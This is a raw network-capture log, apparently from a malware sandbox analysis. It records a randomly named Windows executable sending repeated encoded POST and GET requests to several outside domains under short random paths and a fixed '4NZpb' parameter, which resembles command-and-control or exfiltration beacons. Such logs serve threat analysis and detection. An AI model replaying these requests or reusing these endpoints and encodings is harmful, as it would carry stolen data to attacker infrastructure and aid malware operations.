                                                            Data Ascii: 4NZpb=tOG8ztJbx5p3KKId2ZzspL5atRzUvVucrOFXxPzzE9n62bGBmoS3UOjxnMgVuq8b3bDSj/U0/ccDeq70PLSSmXqBLQ80T5g3SpjCzLWAnJ3md2uSP+gabCrgOZ/mN04XEPpYM0BRD7VL8X1QhMaCvaBaSXCxmSRDiNVHQ9HPpoGtkxR+FEXtyFzQygaNBsmgQesLhqhKrbEriV3P3Qt0HfQ=
                                                            Aug 28, 2024 14:04:26.541315079 CEST396INHTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:26 GMT
                                                            X-Served-By: cache-iad-kjyo7100105-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.44976434.149.87.4580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:28.579457998 CEST10899OUTPOST /oyqt/ HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.martinminorgroup.com
                                                            Referer: http://www.martinminorgroup.com/oyqt/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 74 4f 47 38 7a 74 4a 62 78 35 70 33 4b 4b 49 64 32 5a 7a 73 70 4c 35 61 74 52 7a 55 76 56 75 63 72 4f 46 58 78 50 7a 7a 45 39 66 36 31 70 65 42 67 4b 36 33 56 4f 6a 78 34 38 67 55 75 71 39 48 33 62 62 65 6a 36 4e 44 2f 5a 41 44 52 6f 7a 30 4f 36 53 53 78 48 71 42 44 77 38 33 4f 70 67 48 53 70 7a 47 7a 4c 47 41 6e 4a 33 6d 64 77 71 53 49 73 49 61 64 43 72 6a 45 35 2f 69 61 6b 34 2f 45 50 78 69 4d 30 30 7a 44 72 31 4c 38 33 46 51 6b 2f 2b 43 79 71 42 55 56 58 43 54 6d 53 4e 63 69 4e 59 32 51 2b 62 31 70 6f 69 74 6b 48 39 39 61 41 54 6b 73 32 37 52 73 69 79 63 4a 65 65 53 63 39 59 66 79 37 35 57 30 4a 31 5a 6e 48 4f 2f 75 41 4a 6b 63 4c 4d 30 6a 69 54 43 6f 43 51 4f 4a 37 48 50 6a 43 4f 37 65 7a 44 31 4a 35 38 78 2b 74 56 34 50 77 33 4d 5a 62 4e 69 59 65 43 4b 2b 59 6f 77 4b 76 72 55 77 6f 6e 52 66 38 70 39 34 33 6d 48 6a 72 49 6c 5a 70 44 51 74 76 2f 76 6f 53 67 67 34 57 6e 2f 7a 30 45 59 7a 57 54 73 63 41 52 4f 37 64 77 59 36 38 6b 74 47 49 61 4c 37 70 44 54 78 48 6b 48 78 77 63 6f [TRUNCATED]
                                                            Data Ascii: 4NZpb=tOG8ztJbx5p3KKId2ZzspL5atRzUvVucrOFXxPzzE9f61peBgK63VOjx48gUuq9H3bbej6ND/ZADRoz0O6SSxHqBDw83OpgHSpzGzLGAnJ3mdwqSIsIadCrjE5/iak4/EPxiM00zDr1L83FQk/+CyqBUVXCTmSNciNY2Q+b1poitkH99aATks27RsiycJeeSc9Yfy75W0J1ZnHO/uAJkcLM0jiTCoCQOJ7HPjCO7ezD1J58x+tV4Pw3MZbNiYeCK+YowKvrUwonRf8p943mHjrIlZpDQtv/voSgg4Wn/z0EYzWTscARO7dwY68ktGIaL7pDTxHkHxwcoBsJmiUytdsfZvN+mSqqVGw8o2NlcSCNWzZtWDGC72fN3f/v+EgY53FCfWc8+bgM801f/9IuEP6HtxEuM6YF4AlqE5HcEBAxH0DVIXoi7AXXM/5W40F547WiBwe+l8sai6TH+gdF/DGaTdgf5A8JCZZ99odM5vz9f+qIm8WZXOgCyk0m1BpHSeZTZgjkdo4FfzCkrnJ7rqz2xHkgYg3r3GBIs4BaNyIT6q2ZdvH4QAPC5eM/DdbvrIfA8WFWlB9UR5jHZS3nmv6gwBewMRkW5SWxF/wL3ybLMm4DHD5lgSZa8JhWDI17zlC4m/D7ZHAGyRkiMpys5Vhu1AyYXRJNNWN948/DBiKZYhdh+yNE6JbmoakknlRYlAe6xkHRv5EfXUmfI1/rC+uukfYl+3y9Z0Ef2ZGlS0TEGh7/EH7OZHEc4A8miwp3UeNM+zb9HLczIuDT7GGNW47d/qKHjmMaDtaVTFmfeQoCdeP4MS8FneBDzExeyiVGBksmVrAx9RLsrIrERQoW66OHw4yap8HBO4u7W7oN4PDgMFT2QLQkJgIKuWtPpIUNMbOtgbeT/aUaiOihhh8udqcM66ASX5Cjj3WTRLTkm7YHoXXMutjGEUhZHBfwPsaWesM7j391lX5F6N5VdHIvBZtcl/2TcA9PwqIZzQgoFoBNkif [TRUNCATED]
                                                            Aug 28, 2024 14:04:29.049917936 CEST396INHTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:28 GMT
                                                            X-Served-By: cache-iad-kcgs7200044-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.44976534.149.87.4580792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:31.110239029 CEST520OUTGET /oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:31.579495907 CEST542INHTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:31 GMT
                                                            X-Served-By: cache-iad-kjyo7100149-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.4497663.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:36.612497091 CEST791OUTPOST /pbzm/ HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.atlpicsstudios.com
                                                            Referer: http://www.atlpicsstudios.com/pbzm/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4b 79 79 6b 56 73 2f 32 65 52 6b 48 71 4c 67 66 67 52 7a 4a 6e 4d 56 38 38 71 2b 64 51 45 75 64 54 7a 68 65 75 49 75 63 73 53 63 51 45 74 4b 54 72 6c 51 47 66 41 43 70 47 54 7a 31 6e 69 6a 35 53 41 5a 6b 4f 51 2b 44 51 6d 55 6e 57 44 32 63 65 54 53 4d 32 38 69 31 37 35 72 55 78 53 58 76 41 4f 72 31 79 67 38 6e 6c 5a 70 62 57 58 73 31 66 4b 70 2b 7a 46 69 6e 6f 32 73 70 32 42 52 48 38 58 55 47 52 38 6d 55 74 32 6a 74 34 74 41 53 36 6e 6d 48 78 46 55 58 76 56 58 4b 78 51 7a 2b 6b 71 31 30 4d 74 2f 53 44 65 33 39 52 53 33 4d 5a 65 2f 2f 6a 5a 2f 4d 5a 55 71 72 6b 79 32 30 2f 41 3d 3d
                                                            Data Ascii: 4NZpb=KyykVs/2eRkHqLgfgRzJnMV88q+dQEudTzheuIucsScQEtKTrlQGfACpGTz1nij5SAZkOQ+DQmUnWD2ceTSM28i175rUxSXvAOr1yg8nlZpbWXs1fKp+zFino2sp2BRH8XUGR8mUt2jt4tAS6nmHxFUXvVXKxQz+kq10Mt/SDe39RS3MZe//jZ/MZUqrky20/A==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.4497673.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:39.141765118 CEST811OUTPOST /pbzm/ HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.atlpicsstudios.com
                                                            Referer: http://www.atlpicsstudios.com/pbzm/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4b 79 79 6b 56 73 2f 32 65 52 6b 48 70 72 77 66 69 79 72 4a 68 73 56 2f 7a 4b 2b 64 4b 30 75 52 54 7a 39 65 75 4a 71 4d 73 68 6f 51 48 4d 61 54 71 67 6b 47 63 41 43 70 66 6a 7a 30 70 43 69 33 53 42 6c 73 4f 56 47 44 51 69 38 6e 57 47 53 63 65 6b 2b 50 33 73 69 33 33 5a 72 57 2f 79 58 76 41 4f 72 31 79 6a 41 4e 6c 5a 68 62 57 69 6b 31 64 72 70 39 2b 6c 69 6b 70 32 73 70 38 68 52 4c 38 58 55 77 52 39 36 75 74 77 6e 74 34 6f 45 53 36 56 4f 47 6d 31 56 63 68 31 57 34 30 31 50 7a 72 61 6f 6e 50 71 58 6a 41 76 6a 65 51 55 6d 57 49 76 65 6f 78 5a 62 2f 45 54 6a 66 70 78 4c 39 6b 4f 54 2f 68 38 6a 4d 54 52 37 58 44 34 75 74 75 43 7a 47 74 33 6b 3d
                                                            Data Ascii: 4NZpb=KyykVs/2eRkHprwfiyrJhsV/zK+dK0uRTz9euJqMshoQHMaTqgkGcACpfjz0pCi3SBlsOVGDQi8nWGScek+P3si33ZrW/yXvAOr1yjANlZhbWik1drp9+likp2sp8hRL8XUwR96utwnt4oES6VOGm1Vch1W401PzraonPqXjAvjeQUmWIveoxZb/ETjfpxL9kOT/h8jMTR7XD4utuCzGt3k=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.4497683.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:41.677159071 CEST10893OUTPOST /pbzm/ HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.atlpicsstudios.com
                                                            Referer: http://www.atlpicsstudios.com/pbzm/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4b 79 79 6b 56 73 2f 32 65 52 6b 48 70 72 77 66 69 79 72 4a 68 73 56 2f 7a 4b 2b 64 4b 30 75 52 54 7a 39 65 75 4a 71 4d 73 68 77 51 45 2b 43 54 72 44 4d 47 64 41 43 70 58 44 7a 78 70 43 6a 72 53 42 39 6f 4f 56 43 35 51 6b 34 6e 45 31 71 63 59 56 2b 50 2b 73 69 33 2f 35 72 54 78 53 57 6c 41 4b 33 78 79 67 34 4e 6c 5a 68 62 57 6a 55 31 61 36 70 39 34 6c 69 6e 6f 32 73 75 32 42 51 69 38 58 38 67 52 39 2b 45 74 6a 76 74 34 49 30 53 38 77 36 47 36 6c 56 65 69 31 57 67 30 31 4b 7a 72 61 45 72 50 76 72 46 41 76 58 65 52 6a 48 73 63 4f 75 69 67 6f 32 6a 66 42 4c 2b 6e 53 37 37 71 4d 37 42 6d 5a 37 31 45 53 66 69 50 76 62 39 71 67 33 4f 33 44 50 62 46 70 49 30 6f 78 62 56 6a 4d 4d 64 32 38 38 75 45 7a 61 7a 36 35 49 61 76 38 4d 6a 5a 68 57 35 38 59 31 6d 5a 49 42 30 74 48 42 67 4a 78 78 74 58 54 64 65 4b 4f 6f 73 48 50 77 51 44 67 56 70 78 63 54 43 69 73 49 57 7a 41 4d 38 6f 47 6e 67 77 73 6e 4a 4d 50 30 43 66 79 6e 78 2b 53 68 58 4c 43 74 50 69 71 78 30 2f 64 50 59 42 67 47 45 6e 46 34 58 [TRUNCATED]
                                                            Data Ascii: 4NZpb=KyykVs/2eRkHprwfiyrJhsV/zK+dK0uRTz9euJqMshwQE+CTrDMGdACpXDzxpCjrSB9oOVC5Qk4nE1qcYV+P+si3/5rTxSWlAK3xyg4NlZhbWjU1a6p94lino2su2BQi8X8gR9+Etjvt4I0S8w6G6lVei1Wg01KzraErPvrFAvXeRjHscOuigo2jfBL+nS77qM7BmZ71ESfiPvb9qg3O3DPbFpI0oxbVjMMd288uEzaz65Iav8MjZhW58Y1mZIB0tHBgJxxtXTdeKOosHPwQDgVpxcTCisIWzAM8oGngwsnJMP0Cfynx+ShXLCtPiqx0/dPYBgGEnF4X3DTdelvbx2w3F7+N7kiRdEQYi5U/+Z565hOHT+i/MZ/82vXq0maopiFpCzoPMnPEK38uUpteu2CySlAmRs6ysC7uk8PV9RogxpSKpyRbhTyqAGuaHwXatezam2H5SiLyEO+fCLwL486Ry4EuxtQMWQAcbwz9KyCszOuC73Bq1lOmVebLw/AbC2uHQI1AhqZ8IuBn4bU7gWhG95t/WxG/NdeXw7MDZ6vH433/IN5gVJxv/PmQU+07M2JIJYV2VjLDu2cGuIA855ysG5n73NJTXasBcHhKrkoZ4E8Lj8Nzwy1+lp7a8lM9IT8v354rCZMSmVmPnHWEpGxA8cCdqlgKMWe1mQEHhho2lOnydcBuxrJw7f86JzxFQhBNSf2Kp3twIPNTHLrlA2Zm8vw6JQPdkgB1o0xegl7JwlLG1Gu55gsYMWr7NpzqLsIcVt5WeGD54DjNlxR4fCrxVaa9L+ATD5SqPgAif+EYrxDe6mtWYw/gx1KDhYX6JLxtEJrOqgBYm+Yt8xIcBilU/4TqioYXxtzFm6uHtVZx7aeL4MfBmhlbRuW4op/jmiZ98W/9Jh8cRC0OiBLOPd+hsmNtIC/UFTv/buyWvum215OAEyqO9qWfDksenTsTJEMPp6W8hGAFnu9GweCaOtunD7EowsdEZFHtiPSIn39YWF [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.4497693.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:44.204821110 CEST518OUTGET /pbzm/?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s= HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:44.667821884 CEST400INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 28 Aug 2024 12:04:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 260
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 6c 65 3d 39 58 50 70 5f 30 5f 68 55 72 46 34 35 58 26 34 4e 5a 70 62 3d 48 77 61 45 57 61 54 2b 4d 6a 45 77 2b 63 41 76 2f 30 43 5a 67 50 64 65 38 64 65 44 54 55 32 76 48 57 35 4c 79 62 47 75 6f 78 6b 63 42 75 6a 75 79 6a 63 61 64 47 65 49 47 43 4c 65 2b 77 47 31 55 7a 74 49 42 54 6d 4c 56 58 4d 37 56 45 4f 45 53 6c 65 79 6f 34 47 6e 68 2b 2f 5a 38 42 53 39 45 65 66 66 36 53 42 43 77 49 6b 6c 56 44 56 46 45 4c 51 70 2b 33 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s="}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.449770142.250.186.14780792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:49.908469915 CEST797OUTPOST /ehr0/ HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.openhandedvision.com
                                                            Referer: http://www.openhandedvision.com/ehr0/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 46 6a 5a 55 6a 57 43 79 6d 61 6e 43 69 4f 36 57 49 31 4c 36 7a 6f 73 71 30 74 2b 4b 66 33 64 2b 6f 37 77 42 43 79 62 47 49 66 4f 34 76 48 71 45 5a 67 6d 4d 30 7a 78 31 57 72 46 50 4c 6a 57 44 6e 2b 77 6b 33 6e 39 46 62 4c 57 50 78 6d 70 58 77 50 6a 6f 38 36 75 68 69 53 53 6e 45 75 53 63 35 71 6b 35 65 4c 34 4f 4a 2f 35 71 68 70 55 6f 6b 2b 47 41 41 79 39 49 73 2b 6f 74 51 76 45 2b 35 43 68 64 71 33 38 4f 6d 4c 69 64 33 47 46 51 65 62 72 6f 33 74 44 30 76 6f 41 52 53 38 62 48 74 69 5a 77 63 31 31 32 43 61 34 75 30 34 42 2f 68 39 71 33 54 57 70 43 55 32 77 39 55 31 54 43 6f 51 3d 3d
                                                            Data Ascii: 4NZpb=FjZUjWCymanCiO6WI1L6zosq0t+Kf3d+o7wBCybGIfO4vHqEZgmM0zx1WrFPLjWDn+wk3n9FbLWPxmpXwPjo86uhiSSnEuSc5qk5eL4OJ/5qhpUok+GAAy9Is+otQvE+5Chdq38OmLid3GFQebro3tD0voARS8bHtiZwc112Ca4u04B/h9q3TWpCU2w9U1TCoQ==
                                                            Aug 28, 2024 14:04:51.095119953 CEST410INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:50 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.449771142.250.186.14780792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:52.440644979 CEST817OUTPOST /ehr0/ HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.openhandedvision.com
                                                            Referer: http://www.openhandedvision.com/ehr0/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 46 6a 5a 55 6a 57 43 79 6d 61 6e 43 6a 74 69 57 50 55 4c 36 30 49 73 74 78 74 2b 4b 56 58 64 79 6f 36 4d 42 43 33 37 57 49 74 61 34 76 6c 79 45 59 6b 53 4d 6e 44 78 31 5a 4c 46 4f 42 44 57 49 6e 2b 4d 53 33 6c 70 46 62 4c 53 50 78 6e 5a 58 77 2b 6a 76 39 71 75 6a 2b 53 53 70 41 75 53 63 35 71 6b 35 65 4c 73 33 4a 2f 68 71 68 5a 45 6f 6a 72 71 44 4b 53 39 4c 38 75 6f 74 55 76 45 36 35 43 68 37 71 79 59 30 6d 4a 61 64 33 44 68 51 65 50 33 76 39 74 44 36 6c 49 42 4e 42 2f 2b 73 68 68 6b 51 62 32 56 35 43 6f 34 34 38 65 51 6c 77 4d 4c 67 42 57 4e 78 4a 78 35 4a 5a 32 75 4c 7a 63 4a 4d 67 63 2f 72 6c 64 38 72 78 75 67 5a 55 2f 32 31 34 63 55 3d
                                                            Data Ascii: 4NZpb=FjZUjWCymanCjtiWPUL60Istxt+KVXdyo6MBC37WIta4vlyEYkSMnDx1ZLFOBDWIn+MS3lpFbLSPxnZXw+jv9quj+SSpAuSc5qk5eLs3J/hqhZEojrqDKS9L8uotUvE65Ch7qyY0mJad3DhQeP3v9tD6lIBNB/+shhkQb2V5Co448eQlwMLgBWNxJx5JZ2uLzcJMgc/rld8rxugZU/214cU=
                                                            Aug 28, 2024 14:04:53.282835007 CEST410INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:53 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.449772142.250.186.14780792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:54.973089933 CEST10899OUTPOST /ehr0/ HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.openhandedvision.com
                                                            Referer: http://www.openhandedvision.com/ehr0/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 46 6a 5a 55 6a 57 43 79 6d 61 6e 43 6a 74 69 57 50 55 4c 36 30 49 73 74 78 74 2b 4b 56 58 64 79 6f 36 4d 42 43 33 37 57 49 74 43 34 73 57 36 45 5a 46 53 4d 6b 44 78 31 55 72 46 54 42 44 57 5a 6e 2b 6b 4f 33 6c 56 37 62 49 36 50 77 46 42 58 32 4d 4c 76 79 71 75 6a 6d 53 53 6b 45 75 54 59 35 75 41 39 65 4c 38 33 4a 2f 68 71 68 66 6f 6f 77 65 47 44 46 79 39 49 73 2b 6f 78 51 76 45 47 35 44 49 41 71 79 63 65 68 39 75 64 33 6a 78 51 66 38 66 76 78 74 44 76 6d 49 42 46 42 2f 43 7a 68 68 6f 69 62 33 77 55 43 71 6b 34 35 35 64 41 6c 65 2f 70 66 77 4e 4e 4a 78 52 73 56 42 47 53 36 73 42 69 71 75 2f 66 31 5a 30 66 70 38 64 6e 58 62 4b 57 6b 36 79 75 42 30 46 56 31 70 46 49 47 33 38 5a 30 34 45 47 37 52 5a 64 30 32 46 77 45 70 56 37 6e 59 54 46 36 73 47 47 6d 46 78 4e 52 73 79 57 30 2b 62 41 55 55 78 37 38 57 4a 4a 2f 52 5a 4f 47 72 6e 36 36 58 56 31 7a 78 36 52 58 41 63 63 54 78 72 71 46 30 6f 78 75 6a 65 6b 62 52 6b 38 53 52 47 4f 36 52 44 65 45 4f 74 4d 69 58 70 54 75 75 4e 41 37 6c 2b 76 [TRUNCATED]
